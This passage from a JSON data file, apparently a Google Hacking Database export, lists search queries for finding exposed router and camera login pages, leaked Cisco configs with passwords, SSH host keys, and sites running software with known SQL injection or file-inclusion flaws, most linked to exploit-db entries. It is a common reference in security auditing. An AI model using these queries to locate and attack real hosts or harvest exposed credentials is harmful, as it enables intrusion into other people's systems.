"2006-10-02", "request": "\"LANCOM DSL/*-* Office *\" \"Entry Page\"", "id": 1415}, {"short description": "intitle:\"AdventNet ManageEngine ServiceDesk Plus\" intext:\"Remember Me\"", "long description": "serviceDesk Plus is a 100 % web-based Help Desk and Asset Management software.vendor: h**p://manageengine.adventnet.com/products/service-desk/index.htmlmanual: h**p://manageengine.adventnet.com/products/service-desk/help/adminguide/index.html", "submited": "2006-10-02", "request": "intitle:\"AdventNet ManageEngine ServiceDesk Plus\" intext:\"Remember Me\"", "id": 1416}, {"short description": "\"Welcome to the CyberGuard unit!\"", "long description": "\"Welcome to the CyberGuard unit! To begin configuring your CyberGuard unit now, use the menu to the left, or the Quick Setup Wizard ..\" :)", "submited": "2006-10-02", "request": "\"Welcome to the CyberGuard unit!\"", "id": 1417}, {"short description": "\"SnapGear Management Console\" \"Welcome to the SnapGear Unit!\" -pdf", "long description": "\"Welcome to the SnapGear Unit! To begin configuring your SnapGear unit now, use the menu to the left, or the Quick Setup Wizard ..\" :)PS: this software looks very much like Cyberguard.", "submited": "2006-10-02", "request": "\"SnapGear Management Console\" \"Welcome to the SnapGear Unit!\" -pdf", "id": 1418}, {"short description": "intitle:\"Your Network Device\" Status (LAN | WAN)", "long description": "Login page for the Solwise Sar715+ ADSL Router from solwise.co.uk. Thanks to jeffball55 for the identification of this \"victim\" ;)", "submited": "2006-10-02", "request": "intitle:\"Your Network Device\" Status (LAN | WAN)", "id": 1419}, {"short description": "intitle:\"Net2Phone Init Page\"", "long description": "Net2Phone CommCenter is software that allows you to make phone calls and send faxes to anywhere in the world.", "submited": "2006-10-02", "request": "intitle:\"Net2Phone Init Page\"", "id": 1420}, {"short description": "intitle:Top \"Vantage Service Gateway\" -inurl:zyxel", "long description": "VSG1200 Vantage Service Gateway (topframe), go up one level for the login page. Vendor page at h**p://www.i-tech.com.au/products/7828_ZYXEL_VSG_1200_Vantage_Service_Management.asp", "submited": "2006-10-02", "request": "intitle:Top \"Vantage Service Gateway\" -inurl:zyxel", "id": 1421}, {"short description": "intitle:\"AppServ Open Project *\" \"AppServ is a merging open source software installer package\" -phpbb", "long description": "Often includes phpinfo and unsecured links to phpmyadmin.", "submited": "2006-10-02", "request": "intitle:\"AppServ Open Project *\" \"AppServ is a merging open source software installer package\" -phpbb", "id": 1422}, {"short description": "intitle:ARI \"Phone System Administrator\"", "long description": "Login page for \"Asterisk Recording Interface\" (ARI).", "submited": "2006-10-02", "request": "intitle:ARI \"Phone System Administrator\"", "id": 1423}, {"short description": "intitle:\"EvoCam\" inurl:\"webcam.html\"", "long description": "This search identifies EvoCam cameras accessible over the Internet. There are also public exploits that target these cameras: http://www.exploit-db.com/search/?action=search&filter;_page=1&filter;_description=evocam&filter;_exploit_text=&filter;_author=&filter;_platform=0&filter;_type=0&filter;_lang_id=0&filter;_port=&filter;_osvdb=&filter;_cve=Author: Airloom", "submited": "2010-11-10", "request": "intitle:\"EvoCam\" inurl:\"webcam.html\"", "id": 1424}, {"short description": "||Powered by [ClipBucket 2.0.91]", "long description": "This search identifies clpbpucket installations. They frequently have an admin/admin default password on the administrative backend located at: http://server/admin_area/login.php .Author: Zhran Team", "submited": "2010-11-10", "request": "||Powered by [ClipBucket 2.0.91]", "id": 1425}, {"short description": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "long description": "This search locates private SSHHostkeys.Author: loganWHD", "submited": "2010-11-10", "request": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "id": 1426}, {"short description": "inurl:-cfg intext:\"enable password\"", "long description": "Google search for Cisco config files (some variants below):inurl:router-confginurl:-confg intext:enable passwordinurl:-config intext:\"enable password\"inurl:-cfg intext:\"enable secret\"inurl:-confg intext:enable secretinurl:-confg intext:\"enable secret\"Author: fdisk", "submited": "2010-11-10", "request": "inurl:-cfg intext:\"enable password\"", "id": 1427}, {"short description": "\"Cisco PIX Security Appliance Software Version\" + \"Serial Number\" + \"show ver\" -inurl", "long description": "Google search for Pix Authorization KeysAuthor: fdisk", "submited": "2010-11-10", "request": "\"Cisco PIX Security Appliance Software Version\" + \"Serial Number\" + \"show ver\" -inurl", "id": 1428}, {"short description": "intitle:index.of cisco asa -site:cisco.com", "long description": "Google search for Pix/Asa imagesAuthor: fdisk", "submited": "2010-11-10", "request": "intitle:index.of cisco asa -site:cisco.com", "id": 1429}, {"short description": "intitle:index.of ios -site:cisco.com", "long description": "Google search for Cisco IOS imagesAuthor: fdisk", "submited": "2010-11-10", "request": "intitle:index.of ios -site:cisco.com", "id": 1430}, {"short description": "\"Remote Supervisor Adapter II\" inurl:userlogin_logo.ssi", "long description": "IBM e-server's login pages.Author: DigiP", "submited": "2010-11-10", "request": "\"Remote Supervisor Adapter II\" inurl:userlogin_logo.ssi", "id": 1431}, {"short description": "allintext:\"WebServerX Server at\"", "long description": "Quick and dirty WebserverX HTTP server google dork", "submited": "2010-11-10", "request": "allintext:\"WebServerX Server at\"", "id": 1432}, {"short description": "allintext:\"fs-admin.php\"", "long description": "A foothold using allintext:\"fs-admin.php\" shows the world readable directories of a plug-in that enables Wordpress to be used as a forum. Many of the results of the search also show error logs which give an attacker the server side paths including the home directory name. This name is often also used for the login to ftp and shell access, which exposes the system to attack. There is also an undisclosed flaw in version 1.3 of the software, as the author has mentioned in version 1.4 as a security fix, but does not tell us what it is that was patched.Author: DigiP", "submited": "2010-11-11", "request": "allintext:\"fs-admin.php\"", "id": 1433}, {"short description": "allintitle:\"SyncThru Web Service\"", "long description": "This search finds Internet-connected Samsung printer control panels.", "submited": "2010-11-11", "request": "allintitle:\"SyncThru Web Service\"", "id": 1434}, {"short description": "inurl:/dana-na/auth/", "long description": "Juniper SSLAuthor: bugbear", "submited": "2010-11-12", "request": "inurl:/dana-na/auth/", "id": 1435}, {"short description": "inurl:index.php?pagedb=rss -Vulnerability -inurl", "long description": "CVE: 2007-4007EDB-ID: 4221This google dork possibly exposes sites with the Article Directory (index.php page) Remote File Inclusion Vulnerability", "submited": "2010-11-13", "request": "http://www.google.com/search?q=inurl%3Aindex.php%3Fpagedb%3Drss", "id": 1437}, {"short description": "inurl:src/login.php", "long description": "Locates SquirrelMail Login PagesAuthor: 0daydevilz", "submited": "2010-11-13", "request": "inurl:src/login.php", "id": 1438}, {"short description": "inurl:\"sbw2Behoerden.php\"", "long description": "German.Authorities.CMS SQL Injection Vulnerability.  Bug:  /data/sbw2Behoerden.php?sbwtyp=Author: Bloodman", "submited": "2010-11-14", "request": "inurl:\"sbw2Behoerden.php\"", "id": 1439}, {"short description": "allinurl:com_pccookbook", "long description": "Joomla Component com_pccookbook (user_id) SQL Injection Vulnerability - CVE: 2008-0844:  http://www.exploit-db.com/exploits/5145", "submited": "2010-11-15", "request": "allinurl:com_pccookbook", "id": 1441}, {"short description": "inurl:\"section.php?name=singers\"", "long description": "6rbScript 3.3 (section.php name) Local File Inclusion Vulnerability - CVE: 2008-6453: http://www.exploit-db.com/exploits/6520", "submited": "2010-11-15", "request": "inurl:\"section.php?name=singers\"", "id": 1442}, {"short description": "Powered by v1.14 powered by philboard v1.14", "long description": "W1L3D4 Philboard 1.2 (Blind SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2008-5192: http://www.exploit-db.com/exploits/5958", "submited": "2010-11-15", "request": "Powered by v1.14 powered by philboard v1.14", "id": 1443}, {"short description": "inurl:index.php%\"Submit%Articles\"%\"Member%Login\"%\"Top%Authors\"", "long description": "Article Directory (index.php page) Remote File Inclusion Vulnerability - CVE: 2007-4007: http://www.exploit-db.com/exploits/4221", "submited": "2010-11-15", "request": "inurl:index.php%\"Submit%Articles\"%\"Member%Login\"%\"Top%Authors\"", "id": 1444}, {"short description": "This page was produced using SAM Broadcaster. Copyright Spacial Audio Solutions, LLC 1999 - 2004.", "long description": "samPHPweb (db.php commonpath) Remote File Inclusion Vulnerability - CVE: 2008-0143: http://www.exploit-db.com/exploits/4834", "submited": "2010-11-15", "request": "This page was produced using SAM Broadcaster. Copyright Spacial Audio Solutions, LLC 1999 - 2004.", "id": 1445}, {"short description": "allinurl: \"wordspew-rss.php\"", "long description": "Wordpress Plugin Wordspew Remote SQL Injection Vulnerability - CVE: 2008-0682: http://www.exploit-db.com/exploits/5039", "submited": "2010-11-15", "request": "allinurl: \"wordspew-rss.php\"", "id": 1446}, {"short description": "allinurl: com_clasifier", "long description": "Joomla Component com_clasifier (cat_id) SQL Injection Vulnerability - CVE: 2008-0842: http://www.exploit-db.com/exploits/5146", "submited": "2010-11-15", "request": "allinurl: com_clasifier", "id": 1447}, {"short description": "allinurl: \"com_galeria\"", "long description": "Joomla Component com_galeria Remote SQL Injection Vulnerability - CVE: 2008-0833: http://www.exploit-db.com/exploits/5134", "submited": "2010-11-15", "request": "allinurl: \"com_galeria\"", "id": 1448}, {"short description": "Powered by hwdVideoShare", "long description": "Joomla Component com_hwdvideoshare SQL Injection Vulnerability - CVE: 2008-0916: http://www.exploit-db.com/exploits/5160", "submited": "2010-11-15", "request": "Powered by hwdVideoShare", "id": 1449}, {"short description": "allinurl: modules-php-name-Siir", "long description": "PHP-Nuke Module Siir (id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5169", "submited": "2010-11-15", "request": "allinurl: modules-php-name-Siir", "id": 1450}, {"short description": "allinurl: id \"com_jooget\"", "long description": "Joomla Component jooget", "submited": "2010-11-15", "request": "allinurl: id \"com_jooget\"", "id": 1452}, {"short description": "allinurl: \"modules/wfdownloads/viewcat.php?cid\"", "long description": "XOOPS Module wfdownloads (cid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5218", "submited": "2010-11-15", "request": "allinurl: \"modules/wfdownloads/viewcat.php?cid\"", "id": 1453}, {"short description": "allinurl: \"modules/eEmpregos/index.php\"", "long description": "XOOPS Module eEmpregos (cid) Remote SQL Injection Vulnerability - CVE: 2008-0874: http://www.exploit-db.com/exploits/5157", "submited": "2010-11-15", "request": "allinurl: \"modules/eEmpregos/index.php\"", "id": 1454}, {"short description": "Powered by Active PHP Bookmarks v1.1.02", "long description": "Active PHP Bookmarks 1.1.02 Remote SQL Injection Vulnerability - CVE: 2008-3748: http://www.exploit-db.com/exploits/6277", "submited": "2010-11-15", "request": "Powered by Active PHP Bookmarks v1.1.02", "id": 1455}, {"short description": "powered by Site Sift", "long description": "Site Sift Listings (id) Remote SQL Injection Vulnerability - CVE: 2008-1869: http://www.exploit-db.com/exploits/5383", "submited": "2010-11-15", "request": "powered by Site Sift", "id": 1456}, {"short description": "\"Create your own free webring and bring traffic to your website. Join now, it's free!\"", "long description": "Prozilla Webring Website Script (category.php cat) Remote SQL Injection - CVE: 2007-4362: http://www.exploit-db.com/exploits/4284", "submited": "2010-11-15", "request": "\"Create your own free webring and bring traffic to your website. Join now, it&#039;s free!\"", "id": 1457}, {"short description": "inurl:com_joomladate", "long description": "Joomla Component JoomlaDate (user) SQL injection Vulnerability - CVE: 2008-6068: http://www.exploit-db.com/exploits/5748", "submited": "2010-11-15", "request": "inurl:com_joomladate", "id": 1458}, {"short description": "\"powered by ILIAS\"", "long description": "ILIAS 3.7.4 (ref_id) Blind SQL Injection Vulnerability - CVE: 2008-5816: http://www.exploit-db.com/exploits/7570", "submited": "2010-11-15", "request": "\"powered by ILIAS\"", "id": 1459}, {"short description": "allinurl: \"index.php?option=com_doc\"", "long description": "Joomla Component com_doc Remote SQL Injection Vulnerability - CVE: 2008-0772: http://www.exploit-db.com/exploits/5080", "submited": "2010-11-15", "request": "allinurl: \"index.php?option=com_doc\"", "id": 1461}, {"short description": "Powered by GL-SH DEAF forum 6.5.5 final.", "long description": "PHP Forum ohne My SQL Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/10757", "submited": "2010-11-15", "request": "Powered by GL-SH DEAF forum 6.5.5 final.", "id": 1462}, {"short description": "inurl:com_simpleshop", "long description": "Joomla Component simpleshop 3.4 SQL injection Vulnerability - CVE: 2008-2568: http://www.exploit-db.com/exploits/5743", "submited": "2010-11-15", "request": "inurl:com_simpleshop", "id": 1465}, {"short description": "inurl:\"index.php?pageid=\" Property Listings", "long description": "Realtor 747 (index.php categoryid) Remote SQL Injection Vulnerbility - CVE: 2007-3810: http://www.exploit-db.com/exploits/4184", "submited": "2010-11-15", "request": "inurl:\"index.php?pageid=\" Property Listings", "id": 1466}, {"short description": "\"Powered by Smoothflash\"", "long description": "Smoothflash (admin_view_image.php cid) SQL Injection Vulnerability - CVE: 2008-1623: http://www.exploit-db.com/exploits/5322", "submited": "2010-11-15", "request": "\"Powered by Smoothflash\"", "id": 1467}, {"short description": "display_blog.php", "long description": "Social Site Generator (sgc_id) Remote SQL Injection Vulnerability - CVE: 2008-6419: http://www.exploit-db.com/exploits/5701", "submited": "2010-11-15", "request": "display_blog.php", "id": 1468}, {"short description": "Snipe Gallery v.3.1.5 by Snipe.Net", "long description": "snipe gallery Script Sql Injection: http://www.exploit-db.com/exploits/14053", "submited": "2010-11-15", "request": "Snipe Gallery v.3.1.5 by Snipe.Net", "id": 1469}, {"short description": "Powered by AspDownload", "long description": "ASP Download 1.03 Arbitrary Change Administrator Account Vulnerability - CVE: 2008-6739: http://www.exploit-db.com/exploits/5780", "submited": "2010-11-15", "request": "Powered by AspDownload", "id": 1470}, {"short description": "DA Mailing List System V2 Powered by DigitalArakan.Net", "long description": "DA Mailing List System V2 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/11348", "submited": "2010-11-15", "request": "DA Mailing List System V2 Powered by DigitalArakan.Net", "id": 1471}, {"short description": "Powered By AJ Auction Web", "long description": "AJ Auction Web 2.0 (cate_id) SQL Injection Vulnerability - CVE: 2008-2860: http://www.exploit-db.com/exploits/5867", "submited": "2010-11-15", "request": "Powered By AJ Auction Web", "id": 1472}, {"short description": "''showad.php?listingid=''", "long description": "BM Classifieds 20080409 Multiple SQL Injection Vulnerabilities - CVE: 2008-1272: http://www.exploit-db.com/exploits/5223", "submited": "2010-11-15", "request": "&#039;&#039;showad.php?listingid=&#039;&#039;", "id": 1473}, {"short description": "\"Powered by My PHP Indexer 1.0\"", "long description": "My PHP Indexer 1.0 (index.php) Local File Download Vulnerability - CVE: 2008-6183: http://www.exploit-db.com/exploits/6740", "submited": "2010-11-15", "request": "\"Powered by My PHP Indexer 1.0\"", "id": 1474}, {"short description": "allinurl: \"com_rapidrecipe\"user_id", "long description": "Joomla Component rapidrecipe 1.6.5 SQL Injection Vulnerability - CVE: 2008-0754: http://www.exploit-db.com/exploits/5103", "submited": "2010-11-15", "request": "allinurl: \"com_rapidrecipe\"user_id", "id": 1475}, {"short description": "allinurl: \"modules/dictionary\"", "long description": "XOOPS Module Dictionary 0.94 Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5267", "submited": "2010-11-15", "request": "allinurl: \"modules/dictionary\"", "id": 1476}, {"short description": "\"RS MAXSOFT\"", "long description": "RX Maxsoft (popup_img.php fotoID) Remote SQL Injection Vulnerability - CVE: 2008-4912: http://www.exploit-db.com/exploits/5426", "submited": "2010-11-15", "request": "\"RS MAXSOFT\"", "id": 1477}, {"short description": "\"2007 RADIOZAZA www.radiozaza.de? istek hatti Version 2.5\"", "long description": "Radio istek scripti 2.5 Remote Configuration Disclosure Vulnerability - CVE: 2009-4096: http://www.exploit-db.com/exploits/10231", "submited": "2010-11-15", "request": "\"2007 RADIOZAZA www.radiozaza.de? istek hatti Version 2.5\"", "id": 1478}, {"short description": "allinurl: \"index.php?p=poll\"showresult", "long description": "Koobi Pro 6.25 poll Remote SQL Injection Vulnerability - CVE: 2008-2036: http://www.exploit-db.com/exploits/5448", "submited": "2010-11-15", "request": "allinurl: \"index.php?p=poll\"showresult", "id": 1479}, {"short description": "allinurl: \"com_joovideo\" detail", "long description": "Joomla Component joovideo 1.2.2 (id) SQL Injection Vulnerability - CVE: 2008-1460: http://www.exploit-db.com/exploits/5277", "submited": "2010-11-15", "request": "allinurl: \"com_joovideo\" detail", "id": 1480}, {"short description": "content_by_cat.asp?contentid ''catid''", "long description": "ASPapp Knowledge Base Remote SQL Injection Vulnerability - CVE: 2008-1430: http://www.exploit-db.com/exploits/5286", "submited": "2010-11-15", "request": "content_by_cat.asp?contentid &#039;&#039;catid&#039;&#039;", "id": 1483}, {"short description": "Powered By AlstraSoft Video Share Enterprise", "long description": "AlstraSoft Video Share Enterprise 4.5.1 (UID) SQL Injection Vulnerability - CVE: 2008-3386: http://www.exploit-db.com/exploits/6092", "submited": "2010-11-15", "request": "Powered By AlstraSoft Video Share Enterprise", "id": 1484}, {"short description": "\"Powered by PG Real Estate Solution - real estate web site design\"", "long description": "PG Real Estate (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5306: http://www.exploit-db.com/exploits/7200", "submited": "2010-11-15", "request": "\"Powered by PG Real Estate Solution - real estate web site design\"", "id": 1485}, {"short description": "\"Powered by PG Roomate Finder Solution - roommate estate web site design\"", "long description": "PG Roomate Finder Solution (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5307: http://www.exploit-db.com/exploits/7201", "submited": "2010-11-15", "request": "\"Powered by PG Roomate Finder Solution - roommate estate web site design\"", "id": 1486}, {"short description": "allinurl: com_pcchess \"user_id\"", "long description": "Joomla Component pcchess 0.8 Remote SQL Injection Vulnerability - CVE: 2008-0761: http://www.exploit-db.com/exploits/5104", "submited": "2010-11-15", "request": "allinurl: com_pcchess \"user_id\"", "id": 1487}, {"short description": "Powered by PHP upload - unijimpe.", "long description": "PHP upload - (unijimpe) Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/10732", "submited": "2010-11-15", "request": "Powered by PHP upload - unijimpe.", "id": 1488}, {"short description": "\"Powered by FubarForum v1.6\"", "long description": "FubarForum 1.6 Arbitrary Admin Bypass Vulnerability: http://www.exploit-db.com/exploits/7595", "submited": "2010-11-15", "request": "\"Powered by FubarForum v1.6\"", "id": 1491}, {"short description": "inurl:cfaq/index.php?catid=", "long description": "FAQ Management Script (catid) Remote SQL Injection Vulnerability - CVE: 2008-4743: http://www.exploit-db.com/exploits/6629", "submited": "2010-11-15", "request": "inurl:cfaq/index.php?catid=", "id": 1492}, {"short description": "''name Kose_Yazilari op viewarticle artid''", "long description": "PHP-Nuke Module Kose_Yazilari (artid) SQL Injection Vulnerability - CVE: 2008-1053: http://www.exploit-db.com/exploits/5186", "submited": "2010-11-15", "request": "&#039;&#039;name Kose_Yazilari op viewarticle artid&#039;&#039;", "id": 1493}, {"short description": "inurl: modifyform.html?code=", "long description": "modifyform (modifyform.html) Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/4423", "submited": "2010-11-15", "request": "inurl: modifyform.html?code=", "id": 1494}, {"short description": "allinurl: com_ricette", "long description": "Mambo Component Ricette 1.0 Remote SQL Injection Vulnerability - CVE: 2008-0841: http://www.exploit-db.com/exploits/5133", "submited": "2010-11-15", "request": "allinurl: com_ricette", "id": 1496}, {"short description": "out.php?linkid=1", "long description": "Link ADS 1 (out.php linkid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5930", "submited": "2010-11-15", "request": "out.php?linkid=1", "id": 1497}, {"short description": "\" ActiveKB v1.5 Copyright \"", "long description": "ActiveKB 1.5 Insecure Cookie Handling/Arbitrary Admin Access - CVE: 2008-2338: http://www.exploit-db.com/exploits/5616", "submited": "2010-11-15", "request": "\" ActiveKB v1.5 Copyright \"", "id": 1499}, {"short description": "allinurl:\"com_garyscookbook\"", "long description": "Mambo Component garyscookbook 1.1.1 SQL Injection Vulnerability - CVE: 2008-1137: http://www.exploit-db.com/exploits/5178", "submited": "2010-11-15", "request": "allinurl:\"com_garyscookbook\"", "id": 1500}, {"short description": "inurl:\"index.php?conteudo=\"", "long description": "Waibrasil Remote / Local File Inclusion: http://www.exploit-db.com/exploits/12562", "submited": "2010-11-15", "request": "inurl:\"index.php?conteudo=\"", "id": 1501}, {"short description": "inurl:\"section.php?name=singers\"", "long description": "6rbScript 3.3 (singerid) Remote SQL Injection Vulnerability - CVE: 2008-6454: http://www.exploit-db.com/exploits/6511", "submited": "2010-11-15", "request": "inurl:\"section.php?name=singers\"", "id": 1504}, {"short description": "inurl:cat1.php?catID= \"Spaceacre\"", "long description": "Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability: http://www.exploit-db.com/exploits/12756", "submited": "2010-11-15", "request": "inurl:cat1.php?catID= \"Spaceacre\"", "id": 1505}, {"short description": "\"Powered by FubarForum v1.6\"", "long description": "FubarForum 1.6 Admin Bypass Change User Password Vulnerability: http://www.exploit-db.com/exploits/7606", "submited": "2010-11-15", "request": "\"Powered by FubarForum v1.6\"", "id": 1506}, {"short description": "intext:2003-2008 RC v3.1 Developed by: GA Soft", "long description": "Rapid Classified 3.1 (cldb.mdb) Database Disclosure Vulnerability - CVE: 2008-6388: http://www.exploit-db.com/exploits/7324", "submited": "2010-11-15", "request": "intext:2003-2008 RC v3.1 Developed by: GA Soft", "id": 1507}, {"short description": "inurl:comment.asp intext:Your e-mail address will be used to send you voting and comment activity. Inclusion of your address is optional but Battle Blog cannot notify you of these activities unless you supply an accurate e-mail.", "long description": "Battle Blog 1.25 Auth Bypass SQL Injection / HTML Injection Vulns - CVE: 2009-3718: http://www.exploit-db.com/exploits/9183", "submited": "2010-11-15", "request": "inurl:comment.asp intext:Your e-mail address will be used to send you voting and comment activity. Inclusion of your address is optional but Battle Blog cannot notify you of these activities unless you supply an accurate e-mail.", "id": 1508}, {"short description": "inurl:com_img", "long description": "Joomla Component (com_img) LFI Vulnerability: http://www.exploit-db.com/exploits/15470", "submited": "2010-11-15", "request": "inurl:com_img", "id": 1509}, {"short description": "details.php?p_id=", "long description": "The iceberg 'Content Management System' SQL Injection Vulnerability - CVE: 2010-2016: http://www.exploit-db.com/exploits/12620", "submited": "2010-11-15", "request": "details.php?p_id=", "id": 1511}, {"short description": "allinurl:\"modules/photo/viewcat.php?id\"", "long description": "RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability - CVE: 2008-1551: http://www.exploit-db.com/exploits/5290", "submited": "2010-11-15", "request": "allinurl:\"modules/photo/viewcat.php?id\"", "id": 1512}, {"short description": "powered by 35mm Slide Gallery", "long description": "35mm Slide Gallery Directory Traversal Vulnerability: http://www.exploit-db.com/exploits/10614", "submited": "2010-11-15", "request": "powered by 35mm Slide Gallery", "id": 1514}, {"short description": "allinurl:\"com_simpleshop\"", "long description": "Joomla Component simple shop 2.0 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5177", "submited": "2010-11-15", "request": "allinurl:\"com_simpleshop\"", "id": 1515}, {"short description": "powered by vBulletin 3.8.4", "long description": "vBulletin 3.8.4 &amp; 3.8.5 Registration Bypass Vulnerability: http://www.exploit-db.com/exploits/14833", "submited": "2010-11-15", "request": "powered by vBulletin 3.8.4", "id": 1516}, {"short description": "intitle:Web Calendar system v 3.30 inurl:.asp", "long description": "Web Calendar System 3.12/3.30 Multiple Remote Vulnerabilities - CVE: 2004-1552: http://www.exploit-db.com/exploits/7242", "submited": "2010-11-15", "request": "intitle:Web Calendar system v 3.30 inurl:.asp", "id": 1518}, {"short description": "inurl:index.php?page=en_jobseekers", "long description": "JobSite Professional 2.0 file.php Remote SQL Injection Vulnerability - CVE: 2007-5785: http://www.exploit-db.com/exploits/4576", "submited": "2010-11-15", "request": "inurl:index.php?page=en_jobseekers", "id": 1519}, {"short description": "webwizguestbook_license.asp", "long description": "Web Wiz Guestbook 8.21 (WWGguestbook.mdb) DD Vulnerability - CVE: 2003-1571: http://www.exploit-db.com/exploits/7488", "submited": "2010-11-15", "request": "webwizguestbook_license.asp", "id": 1521}, {"short description": "allinurl: aid \"com_xfaq\"", "long description": "Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability - CVE: 2008-0795: http://www.exploit-db.com/exploits/5109", "submited": "2010-11-15", "request": "allinurl: aid \"com_xfaq\"", "id": 1522}, {"short description": "inurl:modules/flashgames/", "long description": "XOOPS Flashgames Module 1.0.1 Remote SQL Injection Vulnerability - CVE: 2007-2543: http://www.exploit-db.com/exploits/3849", "submited": "2010-11-15", "request": "inurl:modules/flashgames/", "id": 1523}, {"short description": "inurl:index.php?option=com_mediaslide", "long description": "Joomla Component com_mediaslide Directory Traversal Vulnerability: http://www.exploit-db.com/exploits/10591", "submited": "2010-11-15", "request": "inurl:index.php?option=com_mediaslide", "id": 1524}, {"short description": "inurl:\"com_biblestudy\"", "long description": "Joomla Component com_biblestudy LFI Vulnerability - CVE: 2010-0157: http://www.exploit-db.com/exploits/10943", "submited": "2010-11-15", "request": "inurl:\"com_biblestudy\"", "id": 1525}, {"short description": "inurl:\"com_dashboard\"", "long description": "Joomla Component com_dashboard Directory Traversal: http://www.exploit-db.com/exploits/11086", "submited": "2010-11-15", "request": "inurl:\"com_dashboard\"", "id": 1526}, {"short description": "inurl:\"com_jcollection \"", "long description": "Joomla Component com_jcollection Directory Traversal - CVE: 2010-0944: http://www.exploit-db.com/exploits/11088", "submited": "2010-11-15", "request": "inurl:\"com_jcollection \"", "id": 1527}, {"short description": "\"Affiliate Network Pro\"", "long description": "AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability - CVE: 2008-3240: http://www.exploit-db.com/exploits/6087", "submited": "2010-11-15", "request": "\"Affiliate Network Pro\"", "id": 1529}, {"short description": "index.php?option=com_pcchess", "long description": "PrinceClan Chess Mambo Com 0.8 Remote Inclusion Vulnerability - CVE: 2006-5044: http://www.exploit-db.com/exploits/2069", "submited": "2010-11-15", "request": "index.php?option=com_pcchess", "id": 1531}, {"short description": "Powered By: Forest Blog v1.3.2", "long description": "Forest Blog 1.3.2 (blog.mdb) Remote Database Disclosure Vulnerability - CVE: 2008-5780: http://www.exploit-db.com/exploits/7466", "submited": "2010-11-15", "request": "Powered By: Forest Blog v1.3.2", "id": 1532}, {"short description": "intext:\"Powered by phpFastNews\"", "long description": "phpFastNews 1.0.0 Insecure Cookie Handling Vulnerability - CVE: 2008-4622: http://www.exploit-db.com/exploits/6779", "submited": "2010-11-15", "request": "intext:\"Powered by phpFastNews\"", "id": 1533}, {"short description": "Powered by phpDatingClub", "long description": "phpDatingClub (website.php page) Local File Inclusion Vulnerability - CVE: 2008-3179: http://www.exploit-db.com/exploits/6037", "submited": "2010-11-15", "request": "Powered by phpDatingClub", "id": 1534}, {"short description": "\"Powered by: Censura\"", "long description": "Censura 1.15.04 (censura.php vendorid) SQL Injection Vulnerability - CVE: 2007-2673: http://www.exploit-db.com/exploits/3843", "submited": "2010-11-15", "request": "\"Powered by: Censura\"", "id": 1535}, {"short description": "inurl:com_clanlist", "long description": "Joomla Component (com_clanlist) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15456", "submited": "2010-11-15", "request": "inurl:com_clanlist", "id": 1536}, {"short description": "\"This script created by www.script.canavari.com\"", "long description": "Basic Forum 1.1 (edit.asp) Remote SQL Injection Vulnerability - CVE: 2006-6193: http://www.exploit-db.com/exploits/2848", "submited": "2010-11-15", "request": "\"This script created by www.script.canavari.com\"", "id": 1537}, {"short description": "inurl:classified/product_desc.php?id=", "long description": "GreenCart PHP Shopping Cart (id) Remote SQL Injection Vulnerability - CVE: 2008-3585: http://www.exploit-db.com/exploits/6189", "submited": "2010-11-15", "request": "inurl:classified/product_desc.php?id=", "id": 1538}, {"short description": "allinurl:\"members.asp?action\"", "long description": "MiniNuke 2.1 (members.asp uid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5187", "submited": "2010-11-15", "request": "allinurl:\"members.asp?action\"", "id": 1539}, {"short description": "inurl:btg_oglas", "long description": "Joomla Component (btg_oglas) HTML &amp; XSS Injection Vulnerability: http://www.exploit-db.com/exploits/15468", "submited": "2010-11-15", "request": "inurl:btg_oglas", "id": 1540}, {"short description": "Powered by lineaCMS 2006 lineaPHP Group", "long description": "lineaCMS Cross Site Scripting Vulnerability: http://www.exploit-db.com/exploits/10736", "submited": "2010-11-15", "request": "Powered by lineaCMS 2006 lineaPHP Group", "id": 1541}, {"short description": "\"Powered by Scripteen Free Image Hosting Script V 2.3\"", "long description": "Scripteen Free Image Hosting Script 2.3 Insecure Cookie Handling Vuln - CVE: 2009-4987: http://www.exploit-db.com/exploits/9256", "submited": "2010-11-15", "request": "\"Powered by Scripteen Free Image Hosting Script V 2.3\"", "id": 1542}, {"short description": "inurl:\"com_jvideodirect \"", "long description": "Joomla Component com_jvideodirect Directory Traversal - CVE: 2010-0942: http://www.exploit-db.com/exploits/11089", "submited": "2010-11-15", "request": "inurl:\"com_jvideodirect \"", "id": 1543}, {"short description": "\"Siteman Version 1.1.9\"", "long description": "Siteman 1.1.9 (cat) Remote File Disclosure Vulnerability - CVE: 2008-0452: http://www.exploit-db.com/exploits/4973", "submited": "2010-11-15", "request": "\"Siteman Version 1.1.9\"", "id": 1544}, {"short description": "\"SimpleBlog 2.3 by 8pixel.net\"", "long description": "SimpleBlog 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability - CVE: 2006-6191: http://www.exploit-db.com/exploits/2853", "submited": "2010-11-15", "request": "\"SimpleBlog 2.3 by 8pixel.net\"", "id": 1545}, {"short description": "inurl:/squirrelcart/", "long description": "Squirrelcart 2.2.0 (cart_content.php) Remote Inclusion Vulnerability - CVE: 2006-2483: http://www.exploit-db.com/exploits/1790", "submited": "2010-11-15", "request": "inurl:/squirrelcart/", "id": 1546}, {"short description": "inurl:com_markt", "long description": "Joomla Component (com_markt) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15469", "submited": "2010-11-15", "request": "inurl:com_markt", "id": 1547}, {"short description": "\"powered by EQdkp\"", "long description": "EQdkp 1.3.0 (dbal.php) Remote File Inclusion Vulnerability - CVE: 2006-2256: http://www.exploit-db.com/exploits/1764", "submited": "2010-11-15", 